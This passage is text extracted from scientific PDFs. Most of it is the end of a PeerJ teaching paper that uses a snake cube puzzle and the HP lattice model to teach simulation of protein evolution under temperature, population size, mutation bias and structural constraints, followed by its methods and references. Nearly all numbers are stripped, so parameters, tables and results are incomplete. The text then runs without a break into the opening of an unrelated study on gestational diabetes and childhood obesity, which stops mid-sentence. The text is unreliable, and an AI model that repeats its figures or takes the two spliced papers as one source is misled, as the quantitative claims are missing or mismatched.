sure that the transient that we discard is large enough to guarantee convergence and not too large to reduce statistics. moreover, we would miss the interesting information on the time scale τ . the second possibility is to perform a nonlinear fit of eq. ( ). however, non-linear fits require an heuristic optimization that does not guarantee convergence to optimal parameters. the linear fit allows an analytic solution that is preferable, in particular for complex fits involving many parameters. armed with these tools, we investigate the dependence of fitness (hence, stability) on the properties of the evolving population: the physical temperature t at which evolution takes place, the population size n and the mutation bias p. we will finally test the influence of the native structure. temperature figure shows some typical simulations reaching a stationary value under the proposed evolutionary model. each step represents one fixed mutation. the first evolutionary simulation that we propose has the objective to study the effect of temperature, which enters the definition of fitness eq. ( ) through the factor β= /kbt . in fig. we compare results obtained with t = , t = (β= . ) and t = (β= . ). for the sake of comparison, we also show results for random sequences. simulations were made with population size n = . we will analyse the effect of modifying population size in the next section. when t is low (t ∼< ) the fitness function eq. ( ) tends to a binary function of stability: f ≈ if g < and f ≈ otherwise. this corresponds to a neutral fitness landscape in which all proteins that are sufficiently stable are selectively equivalent and all proteins that are unstable are strongly rejected. even random sequences show a bimodal fitness distribution with peaks at f = and f = , as expected for an almost neutral fitness landscape, and fitness close to one can be achieved even by random sequences. for evolved sequences the most likely value of g is only slightly below zero, where the fitness is close to one and the entropy in sequence space is large (taverna & goldstein, ). if t increases (β= . ), the fitness becomes a smooth function of stability and it is more difficult to accept mutations that decrease stability. as a consequence, the mean value is significantly lower than for β= (− . ± . versus− . ± . for β= ). for the same temperature, random sequences have free energies that are on average zero and, correspondingly, fitness distributed around f = . , which is the value attained when g= . under this point of view, the inverse of the physical temperature /t can be regarded as an evolutionary temperature, in that, the larger is /t , the more tolerant is the evolution with respect to mutations that decrease protein stability. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. number of substitutions , , , , , , a ve ra ge fi tn es s (f ) n= n= n= n= figure average fitness versus the number of fixed mutations. each curve represents an evolutionary trajectory for a given population size. random sequences evolved sequences fitness (f) . . . . . . β = . a fitness (f) . . . . . . β = . b fitness (f) . . . . . . β = c Δg - - - d Δg - - - e Δg - - - f figure comparison of the distributions of fitness (a–c) and free energy (d–f) for randomly drawn and evolved sequences. the evolutionary parameters are n = ; p = . . for t = (c,d) we obtain a neutral landscape, and the variation of free energy after the evolutionary process is smaller than for t = (b,e). increasing temperature until t = (a,d) all sequences have almost the same fitness, and evolu- tion becomes an almost random process. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the high temperature limit (β= . ) all sequences have the same fitness f ≈ . independent of g and evolution becomes an almost random process. indeed, it is difficult to obtain higher values for evolving sequences and the mean value of the free energy for evolved sequences, although still negative, approaches zero—with a mean value of − . ± . . neutrality an important consequence of the functional form of the fixation probability eq. ( ) is that the closer f is to the neutral regime in which fitness is a step function of stability, the less the evolutionary process depends on population size. in particular, as we have seen above, for low temperature protein stability approaches the neutral threshold (taverna & goldstein, ), while in a non-neutral regime the equilibrium stability strongly increases with population size. for neutral evolution the substitution rate, i.e., the rate at which mutations become fixed in the population, is independent of n . in fact, if µ denotes the mutation rate and x denotes the probability that mutations are neutral, there will be on average nµx neutral mutations arising in the population per unit time. by eq. ( ), when the fitness of the wild-type and the mutant are equal the probability of fixation tends to /n, and the average number of fixations per unit time tends to the neutral mutation rate µx, independent of population size, as predicted by kimura’s neutral model (kimura, ). population size the next exercise proposes to study the effect of the effective population size n . this may be a good opportunity to discuss the concept, explaining that the effective population size is not just the number of individuals in the population but it is a number that recapitulates its demographic history, in particular bottlenecks. we plot in fig. a the mean value of the free energy in the stationary state (see supplementary methods). when the temperature is low (t ∼< ) the outcome of the evolutionary process is almost independent of the population size n , a hallmark of neutral evolution. when t increases and the fitness is a smooth function of stability, the outcome of evolution strongly depends on population size, in the sense that the equilibirum stability markedly increase with population. finally, for high temperature (e.g., β= . ), evolved sequences have almost identical properties to those of random sequences except for very large population size (nβ≈ ). we show in fig. b the effect of changing temperature for fixed population sizes. as it was shown in the previous section for fixed population size (n = ), a non-neutral regime is observed for intermediate temperature. this effect is more pronounced for larger population sizes, and the free energy reaches a minimum close to β= . for most values of n . we conclude this exercise showing in table the equilibrium values of fitness and stability obtained for different population sizes keeping all the other parameters fixed, within a non-neutral temperature regime (β= . ). we chose this value in such a way that free energy values are clearly distinguishable between any pair of population sizes (see fig. ). we can see that smaller populations attain significantly smaller equilibrium fitness, since the fixation probability of disadvantageous mutations is larger for smaller nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. population size (n) - - - - Δg β= . β= . β= . β= . β= . β= . β= , , , , β - - - - Δg n= n= n= n= a b figure average free energies of evolved sequences. (a) versus population size for different tempera- tures (β= /kbt). (b) versus temperature for different population sizes. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table average and standard deviation for the fitted parameters and free energy obtained in inde- pendent evolutionary processes. the parameters are p= . (balanced mutations) and inverse tempera- ture β= . . n = n = n = n = , f∞ . ± . . ± . . ± . . ± . τ ± ± ± ± g − . ± . − . ± . − . ± . − . ± . table averages and standard deviations for the fitted parameters and free energy obtained in in- dependent evolutionary simulations. the parameters used are n = and β = . . the target structure used is s . different mutation bias are represented. p = . p = . p = . f∞ . ± . . ± . . ± . τ ± ± ± g − . ± . − . ± . − . ± . population, in agreement with the statistical mechanical analogy (sella & hirsh, ). moreover, larger populations also attain significantly larger stability, which shows that the system is far from the neutral regime in which fitness is a stepwise function of stability. for these simulations we observe an exponential trend towards the stationary state and, therefore, we can compute the asymptotic time τ through a linear fit, as explained above. nevertheless, the differences in time scales between the different populations, although systematic, are not significant. in fact, τ depends on the initial value of the fitness, which is a variable that fluctuates strongly, so that a very large number of independent simulations would be necessary to reduce the variability and improve the significance. mutation bias finally, we propose to explore the role of the mutation bias p (see materials and methods). we perform these simulations for population size n = and high temperature β= . , since p is expected to have a more relevant impact for small populations and non- neutral fitness landscapes. table displays results for different values of the mutation bias p= . , . , . corresponding to hydrophobic, neutral and polar sequences, respectively. we see that the equilibrium values of the free energy g display a significant change. as shown in table , the stability against unfolding (i.e., the free energy of the native state) decreases when the mutation bias favours polar sequences and the stability against misfolding (i.e., the free energy of misfolded conformations) has the opposite behaviour. this data also suggest that the folding free energy resulting from both unfolding and misfolding is minimum when the mutation bias is close to the mutation bias p= . at which polar and hydrophobic mutations balance, at least for the chosen parameters (see the quadratic fit in fig. , which has illustrative purposes only). the study of the mutation bias raises two important points from the perspectives of physics and evolution. from the point of view of physics, it allows us to note an important difference between the monte carlo process used to simulate the boltzmann distribution nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. , , , , mutation bias (p) - , - , - , - , - , - Δg quadratic fit figure dependence of the free energy on the mutation bias. a quadratic fit is shown for illustrative purposes only. in statistical physics and the evolutionary process. while in the case of statistical physics the equilibrium distribution does not depend on which mutations are proposed, and it always coincides with the boltzmann distribution by construction, in evolution the limit distribution does depend on the mutation process, and even key properties such as the equilibrium fitness and the stability of proteins are influenced by the mutation bias, as it was shown in méndez et al. ( ). this fact reflects an important difference between the equilibrium distribution in the phase space of statistical physics, i.e., the boltzmann distribution, and the equilibrium distribution in the space of evolving protein sequences. while the boltzmann distribution can be defined as the probability distribution with maximum entropy given a constraint on the average energy, the equilibrium distribution in sequence space can be defined as the distribution with minimum kullback–leibler divergence from the distribution that would be attained by mutation alone, given the constraint on average fitness (arenas, sánchez-cobos & bastolla, ). the correspondence between the two definitions can be appreciated noting that the entropy is equal to the kullback–leibler divergence from the equiprobable distribution, i.e., in the case of statistical physics the reference distribution is the equiprobable distribution, while in the case of evolution the reference distribution is the distribution that would be attained by mutation alone. from the point of view of evolution, the fact that the equilibrium fitness depends on the mutation process creates the possibility of an interesting feedback between selection and mutation, which in turn depends on the replicative machinery of the organism and is under genetic control. in other words, mutation and selection should not be considered as completely independent processes, but there is the possibility that a population selects nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table averages and standard deviations for the fitted parameters and free energies obtained in independent evolutionary simulations. the parameters considered are n = and β = . using the structures s (high designability) and s (low designability) as target. see ‘methods’ for further details. structure s s f∞ . ± . . ± . τ ± ± g − . ± . − . ± . the mutation process that is more convenient to it under its ecological and evolutionary circumstances (méndez et al., ). structural effects finally, we explore the influence of the target structure in the evolutionary process by comparing the least designable structure s and the most designable structure, s (see table ). the structure s reaches higher free energy on average, but with a much smaller value of the time scaleτ , which indicates that it reaches equilibrium faster, consistent with the fact that there are more sequences for which this structure is lower in energy. sequence-structure relationship we conclude our analysis by relating the statistical properties of the evolved sequences and their corresponding structures. this is particularly simple in the hp model, in which each position along the sequence can be characterized by a single parameter representing the frequency at which the position is occupied by a hydrophobic residue in the given ensemble of sequences. for real proteins, each position must be characterized by a dimension vector of the frequency of the different amino acid types (the -th frequency is the result of the normalization condition), called profile in the bioinformatics literature. we plot in fig. the hydrophobicity profiles of random sequences and sequences evolved to fold into structure s for mutation bias p= . (see materials and methods for further details). the profiles of random sequences only depend on the mutation bias but, by definition, they do not differ significantly between one position and the other. in contrast, we observe marked differences between positions for the profiles of evolved sequences. to rationalize these differences, we also report in fig. the number of contacts at each position of the target structure. the predictive correlation between this structural profile and the sequence profile is readily apparent, and implies that in this model the number of contacts determines the hydrophobicity profile of each position (bastolla et al., ). since positions with many contacts are buried in the interior of the native structure, the model recovers the well-known property of real proteins that buried positions tend to be hydrophobic and surface positions tend to be polar, and it shows that this tendency is sufficient to completely determine the hydrophobicity profile in the simple case of the hp model. it can be interesting to suggest further readings that show that the contact energy model eq. ( ) together with a statistical mechanics approach allows us to analytically predict the observed correlation between the number of contacts and the hydrophobicity profile (porto et al., ; arenas, sánchez-cobos & bastolla, ). this point can be proposed as nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure sequence and structure profiles. (a) number of contacts for each position of structure s . (b) frequency of hydrophobic residues at a given position for random sequences and sequences evolved to fold into s . we can see that the number of contacts is a reliable predictor of the frequency of hydropho- bic residues of evolved sequences. this is also consistent with the common observation that deeply buried positions, which have a larger number of contacts, tend to be more hydrophobic. an exercise, and it can be an interesting way to introduce the boltzmann distribution in statistical physics and to deepen the analogy between statistical mechanics and evolution. one consequence of the structural propensities discussed above is that the positions of evolved sequences are more conserved than positions in the random ensemble. we can quantify this through the sequence entropy of each position i, defined as si =− ∑ api(a)ln ( pi(a) ) where a denotes one of the two amino acid types and pi(a) is the profile at position i. the sequence entropy is smaller for evolved than for random sequences. this reduction of entropy is the consequence of the constraints that enforce the stability of the native structure. final remarks in this paper we presented a teaching unit dedicated to the computational study of protein structures, stability and evolution. this area of research is difficult to present to students, since it requires a highly multidisciplinary background that includes statistical mechanics, evolution and computational skills. our experience teaching this subject to students at the master’s program of biophysics of the universidad autónoma of madrid (spain) has shown us that these concepts are easier to present using as a toy model a real toy such as the snake puzzle. this allowed us making abstract concepts more concrete, and opened several avenues towards more advanced subjects of evolutionary and structural bioinformatics. we have selected exercises that, in our opinion, establish simple parallelisms with interesting and simple enough publications that we suggest to the students for further reading. we want to remark that these exercises are not intended to replace other educational tasks that deal with real biological entities. rather, we believe that the proposed approach aids students to establish a fundamental theoretical framework through a computationally and conceptually tractable model. ultimately, these exercises are to provide a foundation nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. upon which students can build increasingly complex biophysical models and design strategies to tackle real biological problems. in our teaching experience, we have realized that students that lack a background in physics face, in general, the most difficult conceptual challenges. for these students, the evolutionary model that we propose may constitute an intuitive introduction to statistical mechanics concepts, and the simulations proposed constitute a practical introduction to scientific computation. in general, we find that students quickly build an intuition on the problem. on the other hand, students with a background in physics usually enjoy this new application of statistical mechanics, but they tend to have severe difficulties to interpret the results from a biological point of view. in our experience, a fruitful way to take advantage of these differences consists in forming working teams of students with different backgrounds. in summary, the increasingly interdisciplinary setting of scientific research requires efforts to overcome traditional boundaries between established academic disciplines. these efforts are yielding promising results through the application of interesting alternatives (searls, ). a suitable scientific academic curriculum should also be evaluated by assessing how students are getting on with their early scientific career stages. in this regard, we believe that incorporating interdisciplinary lectures in the design of academic curricula is of key importance, not only for computational biology (fox & ouellette, ). it is our responsibility to claim for these changes. materials and methods algorithm to solve the snake puzzle to solve the snake puzzle, we adopted a straightforward algorithm that builds the conformations of the snake iteratively and implements an exhaustive search of all maximally compact conformations, i.e., conformations that can be fitted into a cube of side (for the -mer) or (for the -mer). the search is performed on a decision tree whose nodes correspond to spatial arrangements of the consecutive rigid fragments. from each node, there are four possible directions where the next fragment can be placed, since two consecutive fragments cannot be extended in the same direction. for example, if fragment i is placed along the x-axis, fragment i+ can be placed only in the +/−y or +/−z directions. the first two rigid fragments are placed together at the root of the tree and define the oriented x and y-axes. the third fragment can be placed in any direction perpendicular to y, i.e., +x, −x, +z and −z. the last two options are related by mirror symmetry (see also main text), which we can reduce allowing only the placement in the +z direction the first time that the z axis is visited. at each step, the algorithm tests whether the new fragment occupies positions already occupied by other fragments (self-avoidance condition) and whether the partial conformation extends outside the boundaries of the cube. if any of these requirements is not fulfilled, the node is discarded and the algorithm goes back to the parent node, moving in the remaining directions. otherwise, we create the node corresponding to the new accepted conformations and proceed forward. when all four directions have been tested, the algorithm goes back to the parent node. note that the tree can be built starting nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. with any fragment of the puzzle, in particular the initial and final fragments, but also some in between (in this case, it has the choice to start moving forward and then backward or vice versa). we represent the final solution as an ordered string containing, for every fragment, its direction with sign, e.g., (+x,+y,−x,...,+z). this format can be converted to explicit coordinates that can be input to the visualization software used in structural bioinformatics (see main text) to visually inspect the solutions, and used to solve the puzzle manually. designability and energy gap to compute the designability of each of the non-redundant solutions (we exclude s since it is very similar to s , see main text), we randomly draw m sequences of the hp model (i.e., only two amino acid types h and p are considered) with probability p= . that the amino acid is p. for each sequence we compute the effective energies of the target structures using eq. ( ), with the same parameters used by li et al. ( ) (u(h,h)=− . , u(h,p)=− and u(p,p)= ) and assign the sequence to the structure with lowest energy. in this way, we compute the fraction of sequences assigned to each structure. the experiment is replicated times to evaluate the statistical error, with set sizes m= , , , and , . the average and standard error of the mean are plotted as a function of m in fig. . structurally constrained sequence evolution we simulate protein sequence evolution with structural constraints using a monte carlo algorithm illustrated in the main text. we extract the initial sequence a( ) of length l= and compute its free energy eq. ( ) and its fitness, eq. ( ). at each step t of the simulation we mutate a random position of the sequence with bias p for polar replacement. we then compute the free energy and fitness of the new sequence and obtain the probability of fixation pfix, ( ). we then extract a random number ≤ r ≤ and we accept the new sequence (i.e., a(t + )=a′) if r < pfix. otherwise, the old sequence is kept (a(t + )=a(t)). it is important to note that, when the old sequence is kept, its associated evolutionary values are recorded one more time. considering values associated to rejected mutations is needed to ensure that the underlying distribution sampled within the stationary state is indeed a boltzmann distribution, from which we next compute the average of the fitness and free energies. we perform simulations changing some key parameters: nine different temperature values distributed between β= . to β= (see fig. ), three different values for the mutation bias (p= . , . . ) that the mutation is from a hydrophobic to a polar amino acid, four different population sizes (n = , , , , ), and two different target structures (s and s ). the combinations of parameters selected for the simulations are described in the main text. for each set of parameters, independent simulations were run until the stationary was reached. from the fitness values recorded, the average fitness f is computed, and the stationary fitness f∞ and the evolutionary time scale τ obtained through the linear fit described in the main text, eq. ( ). the average of the free energy g and its standard error were computed considering a sufficiently large number of points within the stationary regime. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the values presented in the tables and figures correspond to the mean of the averaged values, and the errors to the propagation of the average errors obtained from the runs. acknowledgements we acknowledge pablo mateos-gil for bringing to our attention the snake puzzle as a toy model of protein structure. we are particularly in debt with raúl guantes, coordinator of the former master on biophysics of the universidad autónoma de madrid (now master on condensed matter physics and biological systems), for his support in the development of these lectures, and to the students for their motivation and feedback. additional information and declarations funding this work is supported by the marie curie training network netadis (fp , grant ) (lbr), by the comunidad de madrid (amarauto program to ub), by the spanish ministry of economy and competitiveness (fpi grant bes- - to apg and bfu - to ub). research at the cbmso is facilitated by the fundación ramón areces. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: marie curie training network netadis: . comunidad de madrid. spanish ministry of economy and competitiveness: bes- - , bfu - . fundación ramón areces. competing interests ugo bastolla is an academic editor for peerj. author contributions • gonzalo s. nido and ludovica bachschmid-romano performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • ugo bastolla conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • alberto pascual-garcía conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the sequence of the rigid elements of the snake cube puzzle, the contact matrices and the script used to solve the puzzle can be found in the url https://github.com/insectopalo/ snake-puzzle references abel z, demaine ed, demaine ml, eisenstat s, lynch j, schardl tb. . finding a hamiltonian path in a cube with specified turns is hard. journal of information processing ( ): – doi . /ipsjjip. . . arenas m, sánchez-cobos a, bastolla u. . maximum-likelihood phylogenetic inference with selection on protein folding stability. molecular biology and evolution ( ): – doi . /molbev/msv . bahar i, rader a. . coarse-grained normal mode analysis in structural biology. current opinion in structural biology ( ): – doi . /j.sbi. . . . bastolla u. . computing protein dynamics from protein structure with elastic network models. wiley interdisciplinary reviews: computational molecular science. ( ): – doi . /wcms. . bastolla u, ortí z a, porto m, f t. . effective connectivity profile: a structural representation that evidences the relationship between protein structures and sequences. proteins : – doi . /prot. . bellemans a. . self-avoiding walks on the simple cubic lattice. physica ( ): – doi . / - ( ) - . berezovsky in, zeldovich kb, shakhnovich ei. . positive and negative design in stability and thermal adaptation of natural proteins. plos computational biology :e doi . /journal.pcbi. . bloom jd, lu z, chen d, raval a, venturelli os, arnold fh. . evolution favors protein mutational robustness in sufficiently large populations. bmc biology ( ): doi . / - - - . bryngelson jd, wolynes pg. . spin glasses and the statistical mechanics of protein folding. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . . chan hs, zhang z, wallin s, liu z. . cooperativity, local-nonlocal coupling, and nonnative interactions: principles of protein folding from coarse-grained models. physical chemistry ( ): – doi . /annurev-physchem- - . chothia c, lesk am. . the relation between the divergence of sequence and structure in proteins. the embo journal ( ): – . cooper s, khatib f, treuille a, barbero j, lee j, beenen m, leaver-fay a, baker d, popović z, players f. . predicting protein structures with a multiplayer online game. nature ( ): – doi . /nature . delano wl. . the pymol molecular graphics system. vol. . san carlos: delano scientific. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/insectopalo/snake-puzzle https://github.com/insectopalo/snake-puzzle http://dx.doi.org/ . /ipsjjip. . http://dx.doi.org/ . /molbev/msv http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . /wcms. http://dx.doi.org/ . /prot. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /pnas. . . http://dx.doi.org/ . /annurev-physchem- - http://dx.doi.org/ . /nature http://dx.doi.org/ . /peerj-cs. derrida b. . random-energy model: an exactly solvable model of disordered systems. physical review b ( ): – doi . /physrevb. . . dokholyan nv, shakhnovich b, shakhnovich ei. . expanding protein uni- verse and its origin from the biological big bang. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . dougherty er, braga-neto u. . epistemology of computational biology: mathe- matical models and experimental prediction as the basis of their validity. journal of biological systems ( ): – doi . /s . drummond da, wilke co. . the evolutionary consequences of erroneous protein synthesis. nature reviews genetics ( ): – doi . /nrg . fortuna ma, zaman l, wagner ap, ofria c. . evolving digital ecological networks. plos computational biology ( ):e doi . /journal.pcbi. . fox ja, ouellette bff. . education in computational biology today and tomorrow. plos computational biology ( ):e doi . /journal.pcbi. . gallagher sr, coon w, donley k, scott a, goldberg ds. . a first attempt to bring computational biology into advanced high school biology classrooms. plos computational biology ( ):e doi . /journal.pcbi. . gardner m. . eleusis: the induction game. in: origami, eleusis, and the soma cubeg. new york: cambridge university press. gibas c, jambeck p. . developing bioinformatics computer skills. sebastopol: o’reilly media, inc. goldstein r. . the evolution and evolutionary consequences of marginal thermosta- bility in proteins. proteins : – doi . /prot. . hartmann ak. . spin glasses: the game. arxiv preprint. arxiv: . v . holm l, sander c. . protein structure comparison by alignment of distance matrices. journal of molecular biology ( ): – doi . /jmbi. . . holm l, sander c. . dali/fssp classification of three-dimensional protein folds. nucleic acids research ( ): – doi . /nar/ . . . humphrey w, dalke a, schulten k. . vmd—visual molecular dynamics. journal of molecular graphics : – doi . / - ( ) - . illergård k, ardell dh, elofsson a. . structure is three to ten times more conserved than sequence—a study of structural response in protein cores. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . ivankov d, garbuzynskiy s, alm e, plaxco k, baker d, finkelstein a. . con- tact order revisited: influence of protein size on the folding rate. protein science : – doi . /ps. . karplus m, ichiye t, pettitt b. . configurational entropy of native proteins. biophysical journal ( ): – doi . /s - ( ) - . kimura m. . a simple method for estimating evolutionary rates of base substitutions through comparative studies of nucleotide sequences. journal of molecular evolution ( ): – doi . /bf . nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /physrevb. . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /s http://dx.doi.org/ . /nrg http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /prot. http://arxiv.org/abs/ . v http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /prot. http://dx.doi.org/ . /ps. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. lauring as, frydman j, andino r. . the role of mutational robustness in rna virus evolution. nature reviews microbiology ( ): – doi . /nrmicro . lazebnik y. . can a biologist fix a radio?-or, what i learned while studying apopto- sis. cancer cell ( ): – doi . /s - ( ) - . levinthal c. . how to fold graciously. mossbauer spectroscopy in biological systems : – . li h, helling r, tang c, wingreen n. . emergence of preferred structures in a simple model of protein folding. science ( ): – doi . /science. . . . liberles da, teichmann sa, bahar i, bastolla u, bloom j, bornberg-bauer e, colwell lj, de koning a, dokholyan nv, echave j, elofsson a, gerloff dl, goldstein ra, grahnen ja, holder mt, lakner c, lartillot n, lovell sc, naylor g, perica t, pollock dd, pupko t, regan l, roger a, rubinstein n, shakhnovich e, sjölander k, sunyaev s, teufel ai, thorne jl, thornton jw, weinreich dm, whelan s. . the interface of protein structure, protein biophysics, and molecular evolution. protein science ( ): – doi . /pro. . méndez r, fritsche m, porto m, bastolla u. . mutation bias favors protein folding stability in the evolution of small populations. plos computational biology ( ):e doi . /journal.pcbi. #close. minning j, porto m, bastolla u. . detecting selection for negative design in proteins through an improved model of the misfolded state. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . miyazawa s, jernigan rl. . residue–residue potentials with a favorable contact pair term and an unfavorable high packing density term, for simulation and threading. journal of molecular biology ( ): – doi . /jmbi. . . murzin ag, brenner se, hubbard t, chothia c. . scop: a structural classification of proteins database for the investigation of sequences and structures. journal of molecular biology ( ): – doi . /jmbi. . . noivirt-brik o, horovitz a, unger r. . trade-off between positive and negative design of protein stability: from lattice models to real proteins. plos computational biology :e doi . /journal.pcbi. . o’donoghue si, goodsell ds, frangakis as, jossinet f, laskowski ra, nilges m, saibil hr, schafferhans a, wade rc, westhof e, olson aj. . visualization of macromolecular structures. nature methods :s –s doi . /nmeth. . orengo c, michie a, jones s, jones d, swindells m, thornton j. . cath—a hierarchic classification of protein domain structures. structure ( ): – doi . /s - ( ) - . o’rourke j. . how to fold it: the mathematics of linkages, origami and polyhedra. new york: cambridge university press. ortiz ar, strauss ce, olmea o. . mammoth (matching molecular models obtained from theory): an automated method for model comparison. protein science ( ): – doi . /ps. . nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nrmicro http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /pro. http://dx.doi.org/ . /journal.pcbi. #close http://dx.doi.org/ . /prot. http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /ps. http://dx.doi.org/ . /peerj-cs. pande vs, joerg c, grosberg ay, tanaka t. . enumerations of the hamilto- nian walks on a cubic sublattice. journal of physics a: mathematical and general ( ): – doi . / - / / / . pascual-garcía a, abia d, méndez r, nido gs, bastolla u. . quantifying the evolutionary divergence of protein structures: the role of function change and func- tion conservation. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . pascual-garcía a, abia d, ortiz Ár, bastolla u. . cross-over between discrete and continuous protein structure space: insights into automatic classification and networks of protein structures. plos computational biology ( ):e doi . /journal.pcbi. . porto m, roman he, vendruscolo m, bastolla u. . prediction of site-specific amino acid distributions and limits of divergent evolutionary changes in protein sequences. molecular biology and evolution ( ): – . rocha j, segura j, wilson rc, dasgupta s. . flexible structural protein align- ment by a sequence of local transformations. bioinformatics ( ): – doi . /bioinformatics/btp . sadreyev ri, kim b-h, grishin nv. . discrete-continuous duality of protein structure space. current opinion in structural biology ( ): – doi . /j.sbi. . . . Šali a, shakhnovich e, karplus m. . how does a protein fold? nature ( ): – doi . / a . sali a, shakhnovich e, karplus m. . kinetics of protein folding. a lattice model study of the requirements for folding to the native state. journal of molecular biology ( ): – doi . /jmbi. . . schneider mv, jimenez rc. . teaching the fundamentals of biological data integration using classroom games. plos computational biology ( ):e doi . /journal.pcbi. . schrödinger e. . what is life? with mind and matter and autobiographical sketches. new york: cambridge university press. searls db. . an online bioinformatics curriculum. plos computational biology ( ):e doi . /journal.pcbi. . sella g, hirsh ae. . the application of statistical physics to evolutionary biology. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . serohijos a, shakhnovich e. . merging molecular mechanism and evolution: theory and computation at the interface of biophysics and evolutionary population genetics. current opinion in structural biology : – doi . /j.sbi. . . . shakhnovich e, gutin a. . enumeration of all compact conformations of copolymers with random sequence of links. the journal of chemical physics ( ): – doi . / . . skolnick j, arakaki ak, lee sy, brylinski m. . the continuity of protein structure space is an intrinsic property of proteins. proceedings of the national nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /prot. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /bioinformatics/btp http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . / a http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. academy of sciences of the united states of america ( ): – doi . /pnas. . soskine m, tawfik ds. . mutational effects and the evolution of new protein functions. nature reviews genetics ( ): – doi . /nrg . taketomi h, ueda y, gō n. . studies on protein folding, unfolding and fluctuations by computer simulation. international journal of peptide and protein research ( ): – . taverna dm, goldstein ra. . why are proteins marginally stable? proteins: structure, function, and bioinformatics ( ): – doi . /prot. . tirion mm. . large amplitude elastic motions in proteins from a single-parameter, atomic analysis. physical review letters ( ): – doi . /physrevlett. . . wallin s, farwer j, bastolla u. . testing similarity measures with continuous and discrete protein models. proteins : – . wilke co. . bringing molecules back into molecular evolution. plos computational biology ( ):e doi . /journal.pcbi. . zhang y, skolnick j. . tm-align: a protein structure alignment algorithm based on the tm-score. nucleic acids research ( ): – doi . /nar/gki . nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /nrg http://dx.doi.org/ . /prot. http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nar/gki http://dx.doi.org/ . /peerj-cs. : – j wang et al. gdm and offspring’s obesity research maternal gestational diabetes and different indicators of childhood obesity: a large study jing wang , , leishen wang , huikun liu , shuang zhang , junhong leng , weiqin li , tao zhang , nan li , wei li , andrea a baccarelli , lifang hou and gang hu tianjin women’s and children’s health center, tianjin, china chronic disease epidemiology laboratory, pennington biomedical research center, baton rouge, louisiana, usa department of environmental health sciences, columbia university mailman school of public health, new york, new york, usa department of preventive medicine, feinberg school of medicine, northwestern university, chicago, illinois, usa correspondence should be addressed to g hu: gang.hu@pbrc.edu abstract previous studies found conflicting results about the associations between the exposure to hyperglycemia in utero and the later risks of childhood overweight and obesity. the aim of the present study is to compare the children’s bmi growth between offspring exposed to maternal gestational diabetes mellitus (gdm) and those not exposed and assess the associations between maternal gdm and their offspring’s overweight and obesity risk. we performed a large observational study in women and their offspring ( gdm and non-gdm mother–child pairs, matched by their offspring’s gender and age). maternal gdm was diagnosed according to the world health organization criteria. childhood height, weight, waist circumference, body fat and skinfold were measured using standardized methods. after adjustment for maternal and children’s characteristics, children born to mothers with gdm during pregnancy had higher mean values of z scores for bmi-for-age, z scores for weight-for-age, waist circumferences, body fat, subscapular skinfold and suprailiac skinfold, in comparison with their counterparts born to mothers with normal glucose during pregnancy (all p values < . ). moreover, maternal gdm was associated with a higher risk of childhood overweight 